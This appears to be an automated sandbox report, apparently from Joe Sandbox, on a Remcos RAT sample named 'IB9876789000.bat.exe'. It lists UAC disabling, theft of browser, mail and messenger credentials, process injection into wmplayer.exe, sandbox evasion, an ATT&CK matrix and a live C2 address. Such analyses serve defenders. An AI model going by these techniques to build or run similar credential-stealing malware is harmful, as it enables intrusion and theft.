                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_00450A7F
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: EnumSystemLocalesW,6_2_00450CF7
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: EnumSystemLocalesW,6_2_00450D42
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: EnumSystemLocalesW,6_2_00450DDD
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_00450E6A
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeQueries volume information: C:\Users\user\Desktop\IB9876789000.bat.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00404915 GetLocalTime,CreateEventA,CreateThread,6_2_00404915
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041A7A2 GetComputerNameExW,GetUserNameW,6_2_0041A7A2
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,6_2_0044800F
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Disables UAC (registry)
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                    Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.4568587228.0000000000D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data6_2_0040B21B
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\6_2_0040B335
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: \key3.db6_2_0040B335
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Tries to steal Instant Messenger accounts or passwords
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Tries to steal Mail credentials (via file registry)
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: ESMTPPassword14_2_004033F0
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword14_2_00402DB3
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword14_2_00402DB3
                    Yara detected WebBrowserPassView password recovery tool
                    Source: Yara matchFile source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wmplayer.exe PID: 7500, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDHJump to behavior
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.regedit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311512308.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.IB9876789000.bat.exe.24311499ec0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.4568587228.0000000000D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: IB9876789000.bat.exe PID: 1220, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: regedit.exe PID: 1900, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: cmd.exe6_2_00405042

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		21
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts111
                    Native API                    		1
                    Windows Service                    		1
                    Bypass User Account Control                    		1
                    Deobfuscate/Decode Files or Information                    		211
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		2
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts12
                    Command and Scripting Interpreter                    		Logon Script (Windows)1
                    Access Token Manipulation                    		2
                    Obfuscated Files or Information                    		2
                    Credentials in Registry                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Remote Access Software                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		Login Hook1
                    Windows Service                    		1
                    Software Packing                    		3
                    Credentials In Files                    		3
                    File and Directory Discovery                    		Distributed Component Object Model211
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script422
                    Process Injection                    		1
                    DLL Side-Loading                    		LSA Secrets38
                    System Information Discovery                    		SSH3
                    Clipboard Data                    		12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Bypass User Account Control                    		Cached Domain Credentials261
                    Security Software Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSync151
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Modify Registry                    		Proc Filesystem4
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Access Token Manipulation                    		Network Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd422
                    Process Injection                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570827 Sample: IB9876789000.bat.exe Startdate: 08/12/2024 Architecture: WINDOWS Score: 100 37 geoplugin.net 2->37 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 19 other signatures 2->49 8 IB9876789000.bat.exe 1 4 2->8         started        signatures3 process4 signatures5 57 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->59 61 Uses regedit.exe to modify the Windows registry 8->61 63 4 other signatures 8->63 11 wmplayer.exe 3 15 8->11         started        16 powershell.exe 23 8->16         started        18 WerFault.exe 19 16 8->18         started        20 3 other processes 8->20 process6 dnsIp7 39 192.210.150.26, 3678, 49717, 49719 AS-COLOCROSSINGUS United States 11->39 41 geoplugin.net 178.237.33.50, 49720, 80 ATOM86-ASATOM86NL Netherlands 11->41 35 C:\ProgramData\remcos\logs.dat, data 11->35 dropped 65 Detected Remcos RAT 11->65 67 Maps a DLL or memory area into another process 11->67 69 Installs a global keyboard hook 11->69 22 wmplayer.exe 1 11->22         started        25 wmplayer.exe 1 11->25         started        27 wmplayer.exe 2 11->27         started        29 wmplayer.exe 11->29         started        71 Loading BitLocker PowerShell Module 16->71 31 WmiPrvSE.exe 16->31         started        33 conhost.exe 16->33         started        file8 signatures9 process10 signatures11 51 Tries to steal Instant Messenger accounts or passwords 22->51 53 Tries to harvest and steal browser information (history, passwords, etc) 22->53 55 Tries to steal Mail credentials (via file / registry access) 25->55

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    IB9876789000.bat.exe42%ReversingLabsByteCode-MSIL.Trojan.Zilla
                    IB9876789000.bat.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.imvu.comr0%Avira URL Cloudsafe
                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                    http://www.ebuddy.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    geoplugin.net
                    		178.237.33.50
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://geoplugin.net/json.gpfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://geoplugin.net/json.gpQMwmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=PbhvCBB7.tmp.13.drfalse
                            		high
                            https://www.office.com/bhvCBB7.tmp.13.drfalse
                              		high
                              http://www.imvu.comrwmplayer.exe, 00000006.00000002.4568924546.0000000004CF0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://geoplugin.net/json.gpl;wmplayer.exe, 00000006.00000003.2182089097.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568652617.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949ebhvCBB7.tmp.13.drfalse
                                  		high
                                  http://www.imvu.comwmplayer.exe, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.2194687494.00000000006BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://upx.sf.netAmcache.hve.10.drfalse
                                      		high
                                      http://www.nirsoft.netwmplayer.exe, 0000000D.00000002.2210606023.0000000000D24000.00000004.00000010.00020000.00000000.sdmpfalse
                                        		high
                                        https://aefd.nelreports.net/api/report?cat=bingaotakbhvCBB7.tmp.13.drfalse
                                          		high
                                          https://deff.nelreports.net/api/report?cat=msnbhvCBB7.tmp.13.drfalse
                                            		high
                                            http://geoplugin.net/json.gpywmplayer.exe, 00000006.00000003.2182089097.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://geoplugin.net/json.gpSystem32wmplayer.exe, 00000006.00000003.2182089097.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwmplayer.exe, 00000006.00000002.4568924546.0000000004CF0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.google.comwmplayer.exe, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073bhvCBB7.tmp.13.drfalse
                                                    		high
                                                    https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AFbhvCBB7.tmp.13.drfalse
                                                      		high
                                                      http://geoplugin.net/wmplayer.exe, 00000006.00000003.2182089097.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568652617.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aefd.nelreports.net/api/report?cat=bingaotbhvCBB7.tmp.13.drfalse
                                                          		high
                                                          http://geoplugin.net/json.gp/CIB9876789000.bat.exe, 00000000.00000002.2242849285.0000024311421000.00000004.00000800.00020000.00000000.sdmp, regedit.exe, 00000005.00000002.4568322800.0000000000400000.00000040.00000400.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://maps.windows.com/windows-app-web-linkbhvCBB7.tmp.13.drfalse
                                                              		high
                                                              http://geoplugin.net/json.gp&Vwmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://geoplugin.net/json.gp=Mwmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://geoplugin.net/pwmplayer.exe, 00000006.00000003.2182089097.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2210276117.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2186212492.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.2181802720.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://aefd.nelreports.net/api/report?cat=bingrmsbhvCBB7.tmp.13.drfalse
                                                                      		high
                                                                      https://www.google.com/accounts/serviceloginwmplayer.exefalse
                                                                        		high
                                                                        https://login.yahoo.com/config/loginwmplayer.exefalse
                                                                          		high
                                                                          http://www.nirsoft.net/wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.imvu.comatawmplayer.exe, 0000000F.00000002.2194687494.00000000006BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://geoplugin.net/json.gpGMwmplayer.exe, 00000006.00000002.4568602325.0000000000D78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.ebuddy.comwmplayer.exe, wmplayer.exe, 0000000F.00000002.2194144592.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                192.210.150.26
                                                                                		unknownUnited States
                                                                                		36352AS-COLOCROSSINGUStrue
                                                                                178.237.33.50
                                                                                		geoplugin.netNetherlands
                                                                                		8455ATOM86-ASATOM86NLfalse

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1570827
